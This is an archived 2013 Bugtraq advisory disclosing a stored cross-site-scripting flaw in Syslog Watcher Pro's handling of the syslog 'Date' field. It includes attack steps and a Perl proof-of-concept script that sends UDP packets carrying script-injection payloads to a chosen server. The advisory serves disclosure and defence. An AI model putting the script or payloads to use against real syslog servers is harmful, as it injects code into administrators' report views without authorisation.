lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201304300941.r3U9f3pZ005072@sf01web1.securityfocus.com> Date: Tue, 30 Apr 2013 09:41:03 GMT From: demonalex@....com To: bugtraq@...urityfocus.com Subject: Syslog Watcher Pro 'Date' Parameter Cross Site Scripting Vulnerability Title: Syslog Watcher Pro 'Date' Parameter Cross Site Scripting Vulnerability Software : Syslog Watcher Pro Software Version : v2.8.0.812(Jun 15, 2009) Vendor: http://www.snmpsoft.com/ Vulnerability Published : 2013-04-27 Vulnerability Update Time : Status : Impact : Medium(CVSS2 Base : 6.4, AV:N/AC:L/Au:N/C:P/I:P/A:N) Bug Description : Syslog Watcher Pro is a Windows-based syslog server for corporate networks. Syslog Watcher Pro collects, stores, parses, displays and explains syslog information to both new and professional network administrators. Syslog Watcher Pro(v2.8.0.812) is vulnerable to XSS by 'Date' Parameter of syslog protocol. How to Attack : STEP 1: Send a syslog packet which contained XSS code into 'Date' Parameter to Syslog Watcher Pro. STEP 2: Syslog Watcher Pro put XSS code into database. STEP 3: XSS code will be executed after victim generate and view report by Syslog Watcher Pro. Proof Of Concept : ----------------------------------------------------------- #!/usr/bin/perl use IO::Socket::INET; $|=1; $host=shift; $port=shift; if(defined($host) && defined($port)){ ; }else{ die "usage: $0 host port\n"; } $con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host); $npriority = '<0>'; $nhostname = "10.0.0.2"; $npid = 'test[10]'; $nmsg = "testing by demonalex"; $testcase1="<script>alert(\"XSS1\")</script>"; $testcase2="<script>alert(/XSS2/)</script>"; #testcase1 $header = $testcase1.' '.$nhostname.' '.$npid; $packet = $npriority.$header.': '.$nmsg; $con->send($packet); #testcase2 $header = $testcase2.' '.$nhostname.' '.$npid; $packet = $npriority.$header.': '.$nmsg; $con->send($packet); $con->close; print "Over!\n"; exit(1); ----------------------------------------------------------- Credits : This vulnerability was discovered by demonalex(at)163(dot)com mail: demonalex(at)163(dot)com / ChaoYi.Huang@...nect.polyu.hk Independent Researcher DBAPPSecurity Co.,Ltd./Hong Kong PolyU
Powered by blists - more mailing lists